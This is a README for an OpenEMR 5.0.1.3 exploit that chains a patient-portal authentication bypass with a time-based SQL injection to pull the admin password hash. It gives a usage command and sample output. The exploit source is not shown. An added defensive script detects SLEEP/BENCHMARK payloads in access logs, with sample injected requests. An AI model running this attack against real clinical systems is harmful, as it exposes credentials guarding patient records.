raskolnikov90 / OpenEMR-5.0.1.3-Authentication-Bypass-Time-Based-SQLi-Exploit

Exploit that combines two known vulnerabilities in OpenEMR 5.0.1.3 to extract the admin account hash

OpenEMR 5.0.1.3 Authentication Bypass Time Based SQLi Exploit

This script abuses two known vulnerabilities to extract the admin password hash: an authentication bypass to the Patient Portal and a SQL injection found in find_appt_popup_user.php.

https://packetstormsecurity.com/files/163181/OpenEMR-5.0.1.3-Authentication-Bypass.html

https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf

Usage:

python3 openemrsqli.py IP:PORT

Result example:

[+] Host Vulnerable. Proceeding exploit
...
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFn
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnB
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnBy
[+] Hash:$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnBy
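Detection side of the activity shown above, as an added example that is not part of the original repository: a log check that flags clients whose requests to find_appt_popup_user.php carry SQL delay functions, or that hit the script in bursts, since recovering a hash one character at a time takes many requests. The log format, the /EXAMPLE/ path prefix, the parameter name p and the threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined style). The /EXAMPLE/ prefix and
# the parameter name "p" are placeholders, not values taken from OpenEMR.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2021:10:00:01 +0000] "GET /EXAMPLE/find_appt_popup_user.php?p=1+AND+SLEEP(3) HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2021:10:00:04 +0000] "GET /EXAMPLE/find_appt_popup_user.php?p=1+AND+SLEEP%283%29 HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2021:10:00:07 +0000] "GET /EXAMPLE/find_appt_popup_user.php?p=1+AND+sleep%25283%2529 HTTP/1.1" 200 512
198.51.100.20 - - [10/Jun/2021:10:01:00 +0000] "GET /EXAMPLE/find_appt_popup_user.php?p=1 HTTP/1.1" 200 2048
198.51.100.20 - - [10/Jun/2021:10:01:05 +0000] "GET /EXAMPLE/other.php?p=sleep(1) HTTP/1.1" 200 100
"""

TARGET = "find_appt_popup_user.php"  # script named in the README
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3}')
DELAY_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)


def suspicious_clients(log_text, burst_threshold=50):
    """Return {client_ip: counters} for clients whose requests to TARGET carry
    a SQL delay function or reach burst_threshold requests (assumed threshold)."""
    stats = defaultdict(lambda: {"requests": 0, "delay_payloads": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path, _, query = m.group("url").partition("?")
        if not path.endswith("/" + TARGET):
            continue  # only the script this page is about
        entry = stats[m.group("ip")]
        entry["requests"] += 1
        # Decode twice so double-encoded payloads (%2528 -> %28 -> "(") are seen.
        decoded = unquote_plus(unquote_plus(query))
        if DELAY_RE.search(decoded):
            entry["delay_payloads"] += 1
    return {ip: c for ip, c in stats.items()
            if c["delay_payloads"] or c["requests"] >= burst_threshold}


if __name__ == "__main__":
    for ip, counters in suspicious_clients(SAMPLE_LOG).items():
        print(ip, counters)
```

Access logs record only the query string, so payloads sent in a request body need WAF or application logging to be visible to this check.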
